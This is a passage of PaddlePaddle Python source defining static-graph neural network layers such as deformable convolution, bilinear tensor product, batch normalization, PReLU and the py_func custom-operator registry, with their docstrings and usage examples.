'output_size': output_size,
'strides': stride,
'paddings': padding,
'padding_algorithm': padding_algorithm,
'dilations': dilation,
'groups': groups,
'use_cudnn': use_cudnn,
'data_format': data_format,
},
)
if data_format == 'NCHW':
pre_act = helper.append_bias_op(pre_bias, dim_start=1, dim_end=2)
else:
pre_act = helper.append_bias_op(pre_bias, dim_start=4, dim_end=5)
out = helper.append_activation(pre_act)
return out
def deformable_conv(
input,
offset,
mask,
num_filters,
filter_size,
stride=1,
padding=0,
dilation=1,
groups=None,
deformable_groups=None,
im2col_step=None,
param_attr=None,
bias_attr=None,
modulated=True,
name=None,
):
r"""
**Deformable Convolution op**
Compute 2-D deformable convolution on 4-D input.
Given input image x, output feature map y, the deformable convolution operation can be expressed as follow:
Deformable Convolution v2:
.. math::
y(p) = \sum_{k=1}^{K}{w_k * x(p + p_k + \Delta p_k) * \Delta m_k}
Deformable Convolution v1:
.. math::
y(p) = \sum_{k=1}^{K}{w_k * x(p + p_k + \Delta p_k)}
Where :math:`\Delta p_k` and :math:`\Delta m_k` are the learnable offset and modulation scalar for the k-th location,
Which :math:`\Delta m_k` is one in deformable convolution v1. Please refer to `Deformable ConvNets v2: More Deformable, Better Results
<https://arxiv.org/abs/1811.11168v2>`_ and `Deformable Convolutional Networks <https://arxiv.org/abs/1703.06211>`_.
Example:
- Input:
Input shape: :math:`(N, C_{in}, H_{in}, W_{in})`
Filter shape: :math:`(C_{out}, C_{in}, H_f, W_f)`
Offset shape: :math:`(N, 2 * deformable\_groups * H_f * H_w, H_{in}, W_{in})`
Mask shape: :math:`(N, deformable\_groups * H_f * H_w, H_{in}, W_{in})`
- Output:
Output shape: :math:`(N, C_{out}, H_{out}, W_{out})`
Where
.. math::
H_{out}&= \frac{(H_{in} + 2 * paddings[0] - (dilations[0] * (H_f - 1) + 1))}{strides[0]} + 1 \\
W_{out}&= \frac{(W_{in} + 2 * paddings[1] - (dilations[1] * (W_f - 1) + 1))}{strides[1]} + 1
Args:
input (Tensor): The input image with [N, C, H, W] format. A Tensor with type
float32, float64.
offset (Tensor): The input coordinate offset of deformable convolution layer.
A Tensor with type float32, float64.
Mask (Tensor, Optional): The input mask of deformable convolution layer.
A Tensor with type float32, float64. It should be None when you use
deformable convolution v1.
num_filters(int): The number of filter. It is as same as the output
image channel.
filter_size (int|tuple): The filter size. If filter_size is a tuple,
it must contain two integers, (filter_size_H, filter_size_W).
Otherwise, the filter will be a square.
stride (int|tuple): The stride size. If stride is a tuple, it must
contain two integers, (stride_H, stride_W). Otherwise, the
stride_H = stride_W = stride. Default: stride = 1.
padding (int|tuple): The padding size. If padding is a tuple, it must
contain two integers, (padding_H, padding_W). Otherwise, the
padding_H = padding_W = padding. Default: padding = 0.
dilation (int|tuple): The dilation size. If dilation is a tuple, it must
contain two integers, (dilation_H, dilation_W). Otherwise, the
dilation_H = dilation_W = dilation. Default: dilation = 1.
groups (int): The groups number of the deformable conv layer. According to
grouped convolution in Alex Krizhevsky's Deep CNN paper: when group=2,
the first half of the filters is only connected to the first half
of the input channels, while the second half of the filters is only
connected to the second half of the input channels. Default: groups=1.
deformable_groups (int): The number of deformable group partitions.
Default: deformable_groups = 1.
im2col_step (int): Maximum number of images per im2col computation;
The total batch size should be devisable by this value or smaller
than this value; if you face out of memory problem, you can try
to use a smaller value here.
Default: im2col_step = 64.
param_attr (ParamAttr, Optional): The parameter attribute for learnable parameters/weights
of deformable conv. If it is set to None or one attribute of ParamAttr,
deformable conv will create ParamAttr as param_attr.
If the Initializer of the param_attr is not set, the parameter is
initialized with :math:`Normal(0.0, std)`, and the
:math:`std` is :math:`(\\frac{2.0 }{filter\_elem\_num})^{0.5}`. Default: None.
bias_attr (ParamAttr|bool, Optional): The parameter attribute for the bias of
deformable conv layer. If it is set to False, no bias will be added
to the output units. If it is set to None or one attribute of ParamAttr, conv2d
will create ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. Default: None.
modulated (bool): Make sure which version should be used between v1 and v2, where v2 is \
used while True. Default: True.
name(str, Optional): For details, please refer to :ref:`api_guide_Name`.
Generally, no setting is required. Default: None.
Returns:
Tensor: The tensor variable storing the deformable convolution \
result. A Tensor with type float32, float64.
Examples:
.. code-block:: python
#deformable conv v2:
import paddle
paddle.enable_static()
C_in, H_in, W_in = 3, 32, 32
filter_size, deformable_groups = 3, 1
data = paddle.static.data(name='data', shape=[None, C_in, H_in, W_in], dtype='float32')
offset = paddle.static.data(name='offset', shape=[None, 2*deformable_groups*filter_size**2, H_in, W_in], dtype='float32')
mask = paddle.static.data(name='mask', shape=[None, deformable_groups*filter_size**2, H_in, W_in], dtype='float32')
out = paddle.static.layers.common.deformable_conv(input=data, offset=offset, mask=mask,
num_filters=2, filter_size=filter_size, padding=1, modulated=True)
#deformable conv v1:
import paddle
C_in, H_in, W_in = 3, 32, 32
filter_size, deformable_groups = 3, 1
data = paddle.static.data(name='data', shape=[None, C_in, H_in, W_in], dtype='float32')
offset = paddle.static.data(name='offset', shape=[None, 2*deformable_groups*filter_size**2, H_in, W_in], dtype='float32')
out = paddle.static.layers.common.deformable_conv(input=data, offset=offset, mask=None,
num_filters=2, filter_size=filter_size, padding=1, modulated=False)
"""
check_variable_and_dtype(
input, "input", ['float32', 'float64'], 'deformable_conv'
)
check_variable_and_dtype(
offset, "offset", ['float32', 'float64'], 'deformable_conv'
)
check_type(
mask, 'mask', (paddle.static.Variable, type(None)), 'deformable_conv'
)
num_channels = input.shape[1]
assert param_attr is not False, "param_attr should not be False here."
helper = LayerHelper('deformable_conv', **locals())
dtype = helper.input_dtype()
if not isinstance(input, paddle.static.Variable):
raise TypeError("Input of deformable_conv must be Tensor")
if not isinstance(offset, paddle.static.Variable):
raise TypeError("Input Offset of deformable_conv must be Tensor")
if groups is None:
num_filter_channels = num_channels
else:
if num_channels % groups != 0:
raise ValueError("num_channels must be divisible by groups.")
num_filter_channels = num_channels // groups
filter_size = utils.convert_to_list(filter_size, 2, 'filter_size')
stride = utils.convert_to_list(stride, 2, 'stride')
padding = utils.convert_to_list(padding, 2, 'padding')
dilation = utils.convert_to_list(dilation, 2, 'dilation')
input_shape = input.shape
filter_shape = [num_filters, int(num_filter_channels)] + filter_size
def _get_default_param_initializer():
filter_elem_num = filter_size[0] * filter_size[1] * num_channels
if filter_elem_num <= 0:
raise ValueError(
"Invalid filter number, excepted number is larger than 0, but"
" received {}, please check the input shape and "
"filter size.".format(filter_elem_num)
)
std = (2.0 / filter_elem_num) ** 0.5
return paddle.nn.initializer.normal.NormalInitializer(0.0, std, 0)
filter_param = helper.create_parameter(
attr=helper.param_attr,
shape=filter_shape,
dtype=dtype,
default_initializer=_get_default_param_initializer(),
)
pre_bias = helper.create_variable_for_type_inference(dtype)
if modulated:
helper.append_op(
type='deformable_conv',
inputs={
'Input': input,
'Filter': filter_param,
'Offset': offset,
'Mask': mask,
},
outputs={"Output": pre_bias},
attrs={
'strides': stride,
'paddings': padding,
'dilations': dilation,
'groups': groups,
'deformable_groups': deformable_groups,
'im2col_step': im2col_step,
},
)
else:
helper.append_op(
type='deformable_conv_v1',
inputs={
'Input': input,
'Filter': filter_param,
'Offset': offset,
},
outputs={"Output": pre_bias},
attrs={
'strides': stride,
'paddings': padding,
'dilations': dilation,
'groups': groups,
'deformable_groups': deformable_groups,
'im2col_step': im2col_step,
},
)
output = helper.append_bias_op(pre_bias, dim_start=1, dim_end=2)
return output
@static_only
def deform_conv2d(
x,
offset,
mask,
num_filters,
filter_size,
stride=1,
padding=0,
dilation=1,
groups=1,
deformable_groups=1,
im2col_step=1,
weight_attr=None,
bias_attr=None,
name=None,
):
r"""
Compute 2-D deformable convolution on 4-D input.
Given input image x, output feature map y, the deformable convolution operation can be expressed as follow:
Deformable Convolution v2:
.. math::
y(p) = \sum_{k=1}^{K}{w_k * x(p + p_k + \Delta p_k) * \Delta m_k}
Deformable Convolution v1:
.. math::
y(p) = \sum_{k=1}^{K}{w_k * x(p + p_k + \Delta p_k)}
Where :math:`\Delta p_k` and :math:`\Delta m_k` are the learnable offset and modulation scalar for the k-th location,
Which :math:`\Delta m_k` is one in deformable convolution v1. Please refer to `Deformable ConvNets v2: More Deformable, Better Results
<https://arxiv.org/abs/1811.11168v2>`_ and `Deformable Convolutional Networks <https://arxiv.org/abs/1703.06211>`_.
Example:
- Input:
X shape: :math:`(N, C_{in}, H_{in}, W_{in})`
Filter shape: :math:`(C_{out}, C_{in}, H_f, W_f)`
Offset shape: :math:`(N, 2 * deformable\_groups * H_f * H_w, H_{in}, W_{in})`
Mask shape: :math:`(N, deformable\_groups * H_f * H_w, H_{in}, W_{in})`
- Output:
Output shape: :math:`(N, C_{out}, H_{out}, W_{out})`
Where
.. math::
H_{out}&= \frac{(H_{in} + 2 * paddings[0] - (dilations[0] * (H_f - 1) + 1))}{strides[0]} + 1 \\
W_{out}&= \frac{(W_{in} + 2 * paddings[1] - (dilations[1] * (W_f - 1) + 1))}{strides[1]} + 1
Args:
x (Tensor): The input image with [N, C, H, W] format. A Tensor with type
float32, float64.
offset (Tensor): The input coordinate offset of deformable convolution layer.
A Tensor with type float32, float64.
mask (Tensor, Optional): The input mask of deformable convolution layer.
A Tensor with type float32, float64. It should be None when you use
deformable convolution v1.
num_filters(int): The number of filter. It is as same as the output
image channel.
filter_size (int|list|tuple): The filter size. If filter_size is a list/tuple,
it must contain two integers, (filter_size_H, filter_size_W).
Otherwise, the filter will be a square.
stride (int|list|tuple, Optional): The stride size. If stride is a list/tuple, it must
contain two integers, (stride_H, stride_W). Otherwise, the
stride_H = stride_W = stride. Default: stride = 1.
padding (int|list|tuple, Optional): The padding size. If padding is a list/tuple, it must
contain two integers, (padding_H, padding_W). Otherwise, the
padding_H = padding_W = padding. Default: padding = 0.
dilation (int|list|tuple, Optional): The dilation size. If dilation is a list/tuple, it must
contain two integers, (dilation_H, dilation_W). Otherwise, the
dilation_H = dilation_W = dilation. Default: dilation = 1.
groups (int, Optional): The groups number of the deformable conv layer. According to
grouped convolution in Alex Krizhevsky's Deep CNN paper: when group=2,
the first half of the filters is only connected to the first half
of the input channels, while the second half of the filters is only
connected to the second half of the input channels. Default: groups=1.
deformable_groups (int, Optional): The number of deformable group partitions.
Default: deformable_groups = 1.
im2col_step (int, Optional): Maximum number of images per im2col computation;
The total batch size should be devisable by this value or smaller
than this value; if you face out of memory problem, you can try
to use a smaller value here.
Default: im2col_step = 1.
weight_attr (ParamAttr, Optional): The parameter attribute for learnable parameters/weights
of deformable conv. If it is set to None or one attribute of ParamAttr,
deformable conv will create ParamAttr as weight_attr.
If the Initializer of the weight_attr is not set, the parameter is
initialized with :math:`Normal(0.0, std)`, and the
:math:`std` is :math:`(\\frac{2.0 }{filter\_elem\_num})^{0.5}`. Default: None.
bias_attr (ParamAttr|bool, Optional): The parameter attribute for the bias of
deformable conv layer. If it is set to False, no bias will be added
to the output units. If it is set to None or one attribute of ParamAttr, conv2d
will create ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. Default: None.
name(str, Optional): For details, please refer to :ref:`api_guide_Name`.
Generally, no setting is required. Default: None.
Returns:
Tensor: The tensor storing the deformable convolution \
result. A Tensor with type float32, float64.
Examples:
.. code-block:: python
#deformable conv v2:
import paddle
paddle.enable_static()
C_in, H_in, W_in = 3, 32, 32
filter_size, deformable_groups = 3, 1
data = paddle.static.data(name='data', shape=[None, C_in, H_in, W_in], dtype='float32')
offset = paddle.static.data(name='offset', shape=[None, 2*deformable_groups*filter_size**2, H_in, W_in], dtype='float32')
mask = paddle.static.data(name='mask', shape=[None, deformable_groups*filter_size**2, H_in, W_in], dtype='float32')
out = paddle.static.nn.deform_conv2d(x=data, offset=offset, mask=mask,
num_filters=2, filter_size=filter_size, padding=1)
#deformable conv v1:
import paddle
paddle.enable_static()
C_in, H_in, W_in = 3, 32, 32
filter_size, deformable_groups = 3, 1
data = paddle.static.data(name='data', shape=[None, C_in, H_in, W_in], dtype='float32')
offset = paddle.static.data(name='offset', shape=[None, 2*deformable_groups*filter_size**2, H_in, W_in], dtype='float32')
out = paddle.static.nn.deform_conv2d(x=data, offset=offset, mask=None,
num_filters=2, filter_size=filter_size, padding=1)
"""
if mask is None:
return deformable_conv(
input=x,
offset=offset,
mask=mask,
num_filters=num_filters,
filter_size=filter_size,
stride=stride,
padding=padding,
dilation=dilation,
groups=groups,
deformable_groups=deformable_groups,
im2col_step=im2col_step,
param_attr=weight_attr,
bias_attr=bias_attr,
modulated=False,
name=name,
)
else:
return deformable_conv(
input=x,
offset=offset,
mask=mask,
num_filters=num_filters,
filter_size=filter_size,
stride=stride,
padding=padding,
dilation=dilation,
groups=groups,
deformable_groups=deformable_groups,
im2col_step=im2col_step,
param_attr=weight_attr,
bias_attr=bias_attr,
modulated=True,
name=name,
)
def bilinear_tensor_product(
x, y, size, act=None, name=None, param_attr=None, bias_attr=None
):
r"""
This layer performs bilinear tensor product on two inputs.
.. math::
out_{i} = x * W_{i} * {y^\mathrm{T}}, i=0,1,...,size-1
In this formula:
- :math:`x`: the first input contains M elements, shape is [batch_size, M].
- :math:`y`: the second input contains N elements, shape is [batch_size, N].
- :math:`W_{i}`: the i-th learned weight, shape is [M, N].
- :math:`out_{i}`: the i-th element of out, shape is [batch_size, size].
- :math:`y^\mathrm{T}`: the transpose of :math:`y_{2}`.
Args:
x (Tensor): 2-D input tensor with shape [batch_size, M]. Data type
is float32 or float64.
y (Tensor): 2-D input tensor with shape [batch_size, N]. Data type
should be same as **x**.
size (int): The dimension of this layer.
act (str|None): Activation to be applied to the output of this layer. Default None.
name(str|None): For detailed information, please refer to
:ref:`api_guide_Name` . Usually name is no need to set and None by default.
param_attr (ParamAttr|None): To specify the weight parameter attribute.
Default: None, which means the default weight parameter property is
used. See usage for details in :ref:`api_fluid_ParamAttr` .
bias_attr (ParamAttr|None): To specify the bias parameter attribute.
Default: None, which means the default bias parameter property is
used. See usage for details in :ref:`api_fluid_ParamAttr` .
Returns:
Tensor, A 2-D Tensor of shape [batch_size, size]. Data type is the same as input **x**.
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
x = paddle.static.data("t1", shape=[-1, 5], dtype="float32")
y = paddle.static.data("t2", shape=[-1, 4], dtype="float32")
tensor = paddle.static.nn.bilinear_tensor_product(x, y, size=1000)
"""
helper = LayerHelper('bilinear_tensor_product', **locals())
dtype = helper.input_dtype('x')
param_shape = [size, x.shape[1], y.shape[1]]
w = helper.create_parameter(
attr=helper.param_attr, shape=param_shape, dtype=dtype, is_bias=False
)
out = helper.create_variable_for_type_inference(dtype=dtype)
inputs = {"X": x, "Y": y, "Weight": w}
if helper.bias_attr:
bias_size = [1, size]
bias = helper.create_parameter(
attr=helper.bias_attr, shape=bias_size, dtype=dtype, is_bias=True
)
inputs["Bias"] = bias
helper.append_op(
type="bilinear_tensor_product", inputs=inputs, outputs={"Out": out}
)
# add activation
return helper.append_activation(out)
def batch_norm(
input,
act=None,
is_test=False,
momentum=0.9,
epsilon=1e-05,
param_attr=None,
bias_attr=None,
data_layout='NCHW',
in_place=False,
name=None,
moving_mean_name=None,
moving_variance_name=None,
do_model_average_for_mean_and_var=True,
use_global_stats=False,
):
r"""
**Batch Normalization Layer**
Can be used as a normalizer function for convolution or fully_connected operations.
The required data format for this layer is one of the following:
1. NHWC `[batch, in_height, in_width, in_channels]`
2. NCHW `[batch, in_channels, in_height, in_width]`
Refer to `Batch Normalization: Accelerating Deep Network Training by Reducing
Internal Covariate Shift <https://arxiv.org/pdf/1502.03167.pdf>`_
for more details.
:math:input is the input features over a mini-batch.
.. math::
\\mu_{\\beta} &\\gets \\frac{1}{m} \\sum_{i=1}^{m} x_i \\qquad &//\\
\ mini-batch\ mean \\\\
\\sigma_{\\beta}^{2} &\\gets \\frac{1}{m} \\sum_{i=1}^{m}(x_i - \\
\\mu_{\\beta})^2 \\qquad &//\ mini-batch\ variance \\\\
\\hat{x_i} &\\gets \\frac{x_i - \\mu_\\beta} {\\sqrt{\\
\\sigma_{\\beta}^{2} + \\epsilon}} \\qquad &//\ normalize \\\\
y_i &\\gets \\gamma \\hat{x_i} + \\beta \\qquad &//\ scale\ and\ shift
moving\_mean = moving\_mean * momentum + mini-batch\_mean * (1. - momentum) \\\\
moving\_var = moving\_var * momentum + mini-batch\_var * (1. - momentum)
moving_mean is global mean and moving_var is global variance.
When use_global_stats = True, the :math:`\\mu_{\\beta}`
and :math:`\\sigma_{\\beta}^{2}` are not the statistics of one mini-batch.
They are global (or running) statistics. (It usually got from the
pre-trained model.)
The training and testing (or inference) have the same behavior:
.. math::
\\hat{x_i} &\\gets \\frac{x_i - \\mu_\\beta} {\\sqrt{\\
\\sigma_{\\beta}^{2} + \\epsilon}} \\\\
y_i &\\gets \\gamma \\hat{x_i} + \\beta
Note:
if build_strategy.sync_batch_norm=True, the batch_norm in network will use
sync_batch_norm automatically.
`is_test = True` can only be used in test program and inference program, `is_test` CANNOT be set to True in train program, if you want to use global status from pre_train model in train program, please set `use_global_stats = True`.
Args:
input(Tensor): The rank of input Tensor can be 2, 3, 4, 5. The data type
is float16 or float32 or float64.
act(string, Default None): Activation type, linear|relu|prelu|...
is_test (bool, Default False): A flag indicating whether it is in
test phrase or not.
momentum(float|Tensor, Default 0.9): The value used for the moving_mean and
moving_var computation. This should be a float number or a Tensor with
shape [1] and data type as float32. The updated formula is:
:math:`moving\_mean = moving\_mean * momentum + new\_mean * (1. - momentum)`
:math:`moving\_var = moving\_var * momentum + new\_var * (1. - momentum)`
Default is 0.9.
epsilon(float, Default 1e-05): A value added to the denominator for
numerical stability. Default is 1e-5.
param_attr(ParamAttr|None): The parameter attribute for Parameter `scale`
of batch_norm. If it is set to None or one attribute of ParamAttr, batch_norm
will create ParamAttr as param_attr, the name of scale can be set in ParamAttr.
If the Initializer of the param_attr is not set, the parameter is initialized
with Xavier. Default: None.
bias_attr(ParamAttr|None): The parameter attribute for the bias of batch_norm.
If it is set to None or one attribute of ParamAttr, batch_norm
will create ParamAttr as bias_attr, the name of bias can be set in ParamAttr.
If the Initializer of the bias_attr is not set, the bias is initialized zero.
Default: None.
data_layout (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
in_place(bool, Default False): Make the input and output of batch norm reuse memory.
name(str|None): For detailed information, please refer to :ref:`api_guide_Name`.
Usually name is no need to set and None by default.
moving_mean_name(str, Default None): The name of moving_mean which store the global Mean. If it
is set to None, batch_norm will save global mean with a random name, otherwise, batch_norm
will save global mean with the string.
moving_variance_name(str, Default None): The name of the moving_variance which store the global Variance.
If it is set to None, batch_norm will save global variance with a random name, otherwise, batch_norm
will save global variance with the string.
do_model_average_for_mean_and_var(bool, Default True): Whether parameter mean and variance should do model
average when model average is enabled.
use_global_stats(bool, Default False): Whether to use global mean and
variance. In inference or test mode, set use_global_stats to true
or is_test to true, and the behavior is equivalent.
In train mode, when setting use_global_stats True, the global mean
and variance are also used during train period.
Returns:
A Tensor which is the result after applying batch normalization on the input,
has same shape and data type with input.
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
x = paddle.static.data(name='x', shape=[3, 7, 3, 7], dtype='float32')
hidden1 = paddle.static.nn.fc(x=x, size=200)
print(hidden1.shape)
# [3, 200]
hidden2 = paddle.static.nn.batch_norm(input=hidden1)
print(hidden2.shape)
# [3, 200]
"""
assert (
bias_attr is not False
), "bias_attr should not be False in batch_norm."
helper = LayerHelper('batch_norm', **locals())
check_variable_and_dtype(
input, 'input', ['float16', 'float32', 'float64'], 'batch_norm'
)
dtype = helper.input_dtype()
# use fp32 for bn parameter
if dtype == core.VarDesc.VarType.FP16:
dtype = core.VarDesc.VarType.FP32
input_shape = input.shape
if data_layout == 'NCHW':
channel_num = input_shape[1]
else:
if data_layout == 'NHWC':
channel_num = input_shape[-1]
else:
raise ValueError("unsupported data layout:" + data_layout)
param_shape = [channel_num]
# create parameter
scale = helper.create_parameter(
attr=helper.param_attr,
shape=param_shape,
dtype=dtype,
default_initializer=paddle.fluid.initializer.Constant(1.0),
)
bias = helper.create_parameter(
attr=helper.bias_attr, shape=param_shape, dtype=dtype, is_bias=True
)
mean = helper.create_parameter(
attr=paddle.ParamAttr(
name=moving_mean_name,
initializer=paddle.fluid.initializer.Constant(0.0),
trainable=False,
do_model_average=do_model_average_for_mean_and_var,
),
shape=param_shape,
dtype=dtype,
)
mean.stop_gradient = True
variance = helper.create_parameter(
attr=paddle.ParamAttr(
name=moving_variance_name,
initializer=paddle.fluid.initializer.Constant(1.0),
trainable=False,
do_model_average=do_model_average_for_mean_and_var,
),
shape=param_shape,
dtype=dtype,
)
variance.stop_gradient = True
# create output
# mean and mean_out share the same memory
mean_out = mean
# variance and variance_out share the same memory
variance_out = variance
if _non_static_mode():
inputs_has_MomemtumTensor = False
attrs_has_momentum = False
tmp_tensor_type = core.eager.Tensor
if isinstance(momentum, tmp_tensor_type):
inputs_has_MomemtumTensor = True
else:
attrs_has_momentum = True
attrs_ = ()
if attrs_has_momentum:
attrs_ = (
'momentum',
momentum,
'epsilon',
epsilon,
'is_test',
is_test,
'data_layout',
data_layout,
'use_mkldnn',
False,
'fuse_with_relu',
False,
'use_global_stats',
use_global_stats,
)
else:
attrs_ = (
'epsilon',
epsilon,
'is_test',
is_test,
'data_layout',
data_layout,
'use_mkldnn',
False,
'fuse_with_relu',
False,
'use_global_stats',
use_global_stats,
)
if inputs_has_MomemtumTensor:
batch_norm_out, _, _, _, _, _ = paddle._legacy_C_ops.batch_norm(
input,
scale,
bias,
mean,
variance,
momentum,
mean_out,
variance_out,
*attrs_,
)
else:
batch_norm_out, _, _, _, _, _ = paddle._legacy_C_ops.batch_norm(
input,
scale,
bias,
mean,
variance,
None,
mean_out,
variance_out,
*attrs_,
)
return paddle.fluid.dygraph_utils._append_activation_in_dygraph(
batch_norm_out, act=act, use_mkldnn=False
)
saved_mean = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True
)
saved_variance = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True
)
reserve_space = None
if not is_test:
reserve_space = helper.create_variable_for_type_inference(
dtype=helper.input_dtype(), stop_gradient=True
)
batch_norm_out = (
input if in_place else helper.create_variable_for_type_inference(dtype)
)
inputs = {
"X": input,
"Scale": scale,
"Bias": bias,
"Mean": mean,
"Variance": variance,
"MeanOut": mean_out,
"VarianceOut": variance_out,
}
attrs = {
"epsilon": epsilon,
"is_test": is_test,
"data_layout": data_layout,
"use_mkldnn": False,
"fuse_with_relu": False,
"use_global_stats": use_global_stats,
}
if isinstance(momentum, paddle.static.Variable):
inputs['MomemtumTensor'] = momentum
else:
attrs['momentum'] = momentum
outputs = {
"Y": batch_norm_out,
"MeanOut": mean_out,
"VarianceOut": variance_out,
"SavedMean": saved_mean,
"SavedVariance": saved_variance,
}
if reserve_space is not None:
outputs["ReserveSpace"] = reserve_space
helper.append_op(
type="batch_norm", inputs=inputs, outputs=outputs, attrs=attrs
)
return helper.append_activation(batch_norm_out)
@static_only
def prelu(x, mode, param_attr=None, data_format="NCHW", name=None):
r"""
prelu activation.
.. math::
prelu(x) = max(0, x) + \alpha * min(0, x)
There are three modes for the activation:
.. code-block:: text
all: All elements share same alpha.
channel: Elements in same channel share same alpha.
element: All elements do not share alpha. Each element has its own alpha.
Parameters:
x (Tensor): The input Tensor or LoDTensor with data type float32.
mode (str): The mode for weight sharing.
param_attr (ParamAttr|None, optional): The parameter attribute for the learnable \
weight (alpha), it can be create by ParamAttr. None by default. \
For detailed information, please refer to :ref:`api_paddle_ParamAttr`.
data_format(str, optional): Data format that specifies the layout of input.
It may be "NC", "NCL", "NCHW", "NCDHW", "NLC", "NHWC" or "NDHWC". Default: "NCHW".
name (str, optional): Name for the operation (optional, default is None). \
For more information, please refer to :ref:`api_guide_Name`.
Returns:
Tensor: A tensor with the same shape and data type as x.
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
x = paddle.static.data(name="x", shape=[None,5,10,10], dtype="float32")
mode = 'channel'
output = paddle.static.nn.prelu(
x,mode,param_attr=paddle.ParamAttr(name='alpha'))
"""
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'prelu')
helper = LayerHelper('prelu', **locals())
if mode not in ['all', 'channel', 'element']:
raise ValueError('mode should be one of all, channel, element.')
alpha_shape = [1]
if mode == 'channel':
true_data_format = [
'NC',
'NCL',
'NCHW',
'NCDHW',
'NLC',
'NHWC',
'NDHWC',
]
if data_format not in true_data_format:
raise ValueError(
"data_format must be one of 'NC', 'NCL', 'NCHW', 'NCDHW', "
"'NLC', 'NHWC', 'NDHWC' but receive {}".format(data_format)
)
data_format = 'NCHW' if data_format[1] == 'C' else 'NHWC'
assert (
len(x.shape) >= 2
), "The size of input shape should be equal or larger than 2 in prelu() when mode is 'channel'"
# NOTE(zhiqiu): The alpha_shape should be [1, channel] + [1] * len(x.shape[2:]).
# To be consistent with Prelu, it is simplified.
# NOTE(zhiqiu): Revert shape to [1, channel, 1, 1] for compatibility with saved model of old version.
# NOTE(GuoxiaWang): support NHWC data format
if data_format == 'NHWC':
alpha_shape = [1, 1, 1, x.shape[-1]]
else:
alpha_shape = [1, x.shape[1], 1, 1]
elif mode == 'element':
assert (
len(x.shape) >= 1
), "The size of input shape should be equal or larger than 1 in prelu() when mode is 'element'"
alpha_shape = [1] + list(x.shape)[1:]
dtype = helper.input_dtype(input_param_name='x')
alpha = helper.create_parameter(
attr=helper.param_attr,
shape=alpha_shape,
dtype=dtype,
is_bias=False,
default_initializer=paddle.nn.initializer.Constant(0.25),
)
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="prelu",
inputs={"X": x, 'Alpha': alpha},
attrs={"mode": mode, "data_format": data_format},
outputs={"Out": out},
)
return out
class PyFuncRegistry:
_register_funcs = []
def __init__(self, func):
if func is None or not callable(func):
raise TypeError('func must be a Python function')
self._func = func
# find named args using reflection
args = inspect.getfullargspec(self._func)
if len(args[0]) == 0 and args[1] is None and args[2] is None:
# Function with no inputs
self._named_args = None
else:
self._named_args = args[0]
self._id = core._append_python_callable_object_and_return_id(self)
'''
Why record self here?
1. For debug usage. Users can call
:code:`py_func.registered_func(idx)` method
to find the registered function corresponding
to :code:`idx`.
2. For increasing reference count of self.
It seems that to release Python object
whose reference count is 1 would cause
segmentation fault error in C++ side.
May be lack of Python GC in C++ side?
'''
PyFuncRegistry._register_funcs.append(self)
@classmethod
def registered_func(cls, idx):
return cls._register_funcs[idx]._func
@classmethod
def registered_func_num(cls):
return len(cls._register_funcs)
@property
def id(self):
return self._id
def __call__(self, *args):
if self._named_args is None:
func_ret = self._func()
else:
kwargs = dict()
idx = 0
for arg in self._named_args:
kwargs[arg] = args[idx]
idx += 1
func_ret = self._func(*args[idx:], **kwargs)
if not isinstance(func_ret, (list, tuple)):
func_ret = (func_ret,)
ret = []
for each_ret in func_ret:
if each_ret is None or isinstance(each_ret, core.LoDTensor):
ret.append(each_ret)
continue
if not isinstance(each_ret, np.ndarray):
each_ret = np.array(each_ret)
tensor = core.LoDTensor()
tensor.set(each_ret, core.CPUPlace())
ret.append(tensor)
return tuple(ret)
@static_only
@templatedoc()
def py_func(func, x, out, backward_func=None, skip_vars_in_backward_input=None):
"""
This is used to register customized Python OP to Paddle. The design
principe of py_func is that Tensor and numpy array can be converted to each
other easily. So you can use Python and numpy API to register a python OP.
The forward function of the registered OP is ``func`` and the backward function
of that is ``backward_func``. Paddle will call ``func`` at forward runtime and
call ``backward_func`` at backward runtime(if ``backward_func`` is not None).
``x`` is the input of ``func``, whose type must be Tensor; ``out`` is
the output of ``func``, whose type can be either Tensor or numpy array.
The input of the backward function ``backward_func`` is ``x``, ``out`` and
the gradient of ``out``. If ``out`` have no gradient, the relevant input of
``backward_func`` is None. If ``x`` do not have a gradient, the user should
return None in ``backward_func``.
The data type and shape of ``out`` should also be set correctly before this
API is called, and the data type and shape of the gradient of ``out`` and
``x`` will be inferred automatically.
This API can also be used to debug the neural network by setting the ``func``
as a function that only print variables.
Args:
func (callable): The forward function of the registered OP. When the network
is running, the forward output ``out`` will be calculated according to this
function and the forward input ``x``. In ``func`` , it's suggested that we
actively convert Tensor into a numpy array, so that we can use Python and
numpy API arbitrarily. If not, some operations of numpy may not be compatible.
x (Tensor|tuple(Tensor)|list[Tensor]): The input of the forward function ``func``.
It can be Tensor|tuple(Tensor)|list[Tensor]. In addition, Multiple Tensor
should be passed in the form of tuple(Tensor) or list[Tensor].
out (T|tuple(T)|list[T]): The output of the forward function ``func``, it can be
T|tuple(T)|list[T], where T can be either Tensor or numpy array. Since Paddle
cannot automatically infer the shape and type of ``out``, you must create
``out`` in advance.
backward_func (callable, optional): The backward function of the registered OP.
Its default value is None, which means there is no reverse calculation. If
it is not None, ``backward_func`` is called to calculate the gradient of
``x`` when the network is at backward runtime.
skip_vars_in_backward_input (Tensor, optional): It's used to limit the input
list of ``backward_func``, and it can be Tensor|tuple(Tensor)|list[Tensor].
It must belong to either ``x`` or ``out``. The default value is None, which means
that no tensors need to be removed from ``x`` and ``out``. If it is not None,
these tensors will not be the input of ``backward_func``. This parameter is only
useful when ``backward_func`` is not None.
Returns:
Tensor|tuple(Tensor)|list[Tensor]: The output ``out`` of the forward function ``func``.
Examples:
.. code-block:: python
# example 1:
import paddle
import numpy as np
paddle.enable_static()
# Creates a forward function, Tensor can be input directly without
# being converted into numpy array.
def tanh(x):
return np.tanh(x)
# Skip x in backward function and return the gradient of x
# Tensor must be actively converted to numpy array, otherwise,
# operations such as +/- can't be used.
def tanh_grad(y, dy):
